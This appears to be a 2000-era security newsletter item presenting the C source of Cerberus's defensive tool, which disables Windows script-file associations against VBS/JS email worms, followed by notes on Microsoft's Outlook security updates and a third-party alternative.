The tool the Cerberus Security Team has written goes through the registry and removes these application / file extension associations for VBS, VBE, WSF, WSH, JS and JSE, and any viruses or worms that rely on these associations will therefore fail. These are all "dangerous" mappings and, to be perfectly frank, most computer users never use the functionality provided by these. Note exactly what the tool changes: it overwrites the default value of the Open and Open2 command keys under HKEY_CLASSES_ROOT (for example VBSFile\Shell\Open\Command), so a double-click or "Open" on such a file no longer launches wscript.exe; a script started explicitly with "wscript.exe file.vbs" or "cscript.exe file.vbs" still runs. They provide the source code at the end of this mail and also make the binary version available from their website: http://www.cerberus-infosec.co.uk/vf.exe

It has been tested on Windows 98, Windows NT 4 and Windows 2000. Though not yet tested on Windows 95 it should still work.
Source:

////////////////////////////////////////////////////////////////////////////////////
//
// compile with eg Visual C++ link with advapi32.lib
//
// Cerberus Information Security, Ltd
//
// 8th May 2000
//
////////////////////////////////////////////////////////////////////////////////////

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winreg.h>

#define SUCCESS 1
#define FAILURE 0

/* Root under which the file-type keys live; replaced by a remote handle
   when a hostname is given on the command line. */
HKEY KeyToChange = HKEY_CLASSES_ROOT;

int ChangeFileAssociations(void);
int ConnectToRemoteRegistry(char *);
LONG DoSetAKey(HKEY, char *, char *);

int main(int argc, char *argv[])
{
    DWORD chk = 0;
    char hostname[260] = "\\\\";
    char *errors = "There were errors changing the file associations.\n";
    char *noerrors = "VBS,VBE,WSF,WSH,JS and JSE file associations have been changed.\n";

    printf("\nCerberus Security Team\nhttp://www.cerberus-infosec.co.uk/\n8th May 2000\n\n");

    if (argc == 1) {
        /* no argument: change the local machine */
        chk = ChangeFileAssociations();
        if (chk) {
            printf("%s", noerrors);
            return SUCCESS;
        } else {
            printf("%s", errors);
            return FAILURE;
        }
    } else {
        if ((stricmp(argv[1], "/?") == 0) || (stricmp(argv[1], "-?") == 0) ||
            (stricmp(argv[1], "/h") == 0) || (stricmp(argv[1], "-h") == 0) ||
            (stricmp(argv[1], "?") == 0) || (stricmp(argv[1], "help") == 0) ||
            (stricmp(argv[1], "/help") == 0)) {
            printf("usage: vf [hostname]\n");
            return 0;
        } else {
            /* argument: do the same on a remote machine's registry */
            strncat(hostname, argv[1], 250);
            chk = ConnectToRemoteRegistry(hostname);
            if (!chk) {
                printf("Error connecting to %s\n", hostname);
                return FAILURE;
            } else {
                chk = ChangeFileAssociations();
                if (chk) {
                    printf("%s", noerrors);
                    return SUCCESS;
                } else {
                    printf("%s", errors);
                    return FAILURE;
                }
            }
        }
    }
}

int ConnectToRemoteRegistry(char *host)
{
    HKEY hkcr = HKEY_CLASSES_ROOT;
    LONG connect;

    /* Note: RegConnectRegistry documents only HKEY_LOCAL_MACHINE, HKEY_USERS and
       HKEY_PERFORMANCE_DATA as remotable roots. If HKEY_CLASSES_ROOT is refused,
       connect to HKEY_LOCAL_MACHINE instead and prefix the key names below with
       SOFTWARE\Classes\, which is where the machine-wide file types are stored. */
    connect = RegConnectRegistry(host, hkcr, &KeyToChange);
    if (connect == ERROR_SUCCESS) {
        return SUCCESS;
    } else {
        return FAILURE;
    }
}

int ChangeFileAssociations(void)
{
    /* The default value of each of these keys is the command line Explorer
       runs for the verb; replacing it with a non-command leaves nothing to
       execute. File types that are not registered on the machine are skipped. */
    static const char *keys[] = {
        "VBSFile\\Shell\\Open\\Command", "VBSFile\\Shell\\Open2\\Command",
        "WSHFile\\Shell\\Open\\Command", "WSHFile\\Shell\\Open2\\Command",
        "VBEFile\\Shell\\Open\\Command", "VBEFile\\Shell\\Open2\\Command",
        "WSFFile\\Shell\\Open\\Command", "WSFFile\\Shell\\Open2\\Command",
        "JSEFile\\Shell\\Open\\Command", "JSEFile\\Shell\\Open2\\Command",
        "JSFile\\Shell\\Open\\Command",  "JSFile\\Shell\\Open2\\Command",
    };
    LONG chk = 0;
    size_t i;

    for (i = 0; i < sizeof(keys) / sizeof(keys[0]); i++) {
        chk = DoSetAKey(KeyToChange, (char *)keys[i], "Foobar");
        if (chk != SUCCESS && chk != ERROR_FILE_NOT_FOUND) {
            return FAILURE;
        }
    }
    return SUCCESS;
}

LONG DoSetAKey(HKEY root, char *key, char *set)
{
    HKEY hResult;
    LONG nResult;

    nResult = RegOpenKeyEx(root, key, 0, KEY_WRITE, &hResult);
    if (nResult != ERROR_SUCCESS) {
        if (nResult == ERROR_FILE_NOT_FOUND) {
            return ERROR_FILE_NOT_FOUND;   /* this file type is not registered here */
        }
        printf("Error %ld opening %s\n", nResult, key);
        return FAILURE;
    }
    /* The verb's command line is the key's default (unnamed) REG_SZ value;
       the length passed must include the terminating NUL. */
    nResult = RegSetValueEx(hResult, NULL, 0, REG_SZ, (CONST BYTE *)set,
                            (DWORD)strlen(set) + 1);
    RegCloseKey(hResult);
    if (nResult != ERROR_SUCCESS) {
        printf("Error %ld writing %s\n", nResult, key);
        return FAILURE;
    }
    printf("Changed %s\n", key);
    return SUCCESS;
}

Microsoft released the binaries for their Email Security Update. Available now is a version for Outlook 98: http://www.officeupdate.com/downloadDetails/Out98sec.htm and Outlook 2000 SR-1: http://www.officeupdate.com/2000/downloaddetails/Out2ksec.htm

Nothing is currently available to alter the way Outlook Express works. These updates are strictly for Outlook 98/2000 SR-1. Note that after installing the Outlook 98 Security Update on some test workstations, you will find that it works as advertised on NT and Win 98 machines, but on the Win 95 machines you can no longer route documents from Word 97.
When you try to route a document in Word 97 via File - Send To - Routing Recipient, you will get the error "YOUR MAIL SYSTEM DOES NOT SUPPORT CERTAIN SERVICES NEEDED FOR DOCUMENT ROUTING".

Reliable Software Technologies released a new program designed to prevent e-mail macro viruses from spreading. It can be used along with or instead of the Microsoft-supplied e-mail protection patch. JustBeFriends works with all versions of Outlook and Outlook Express, and is substantially simpler than the Microsoft patch. For full details, see http://www.rstcorp.com/news/jbf.html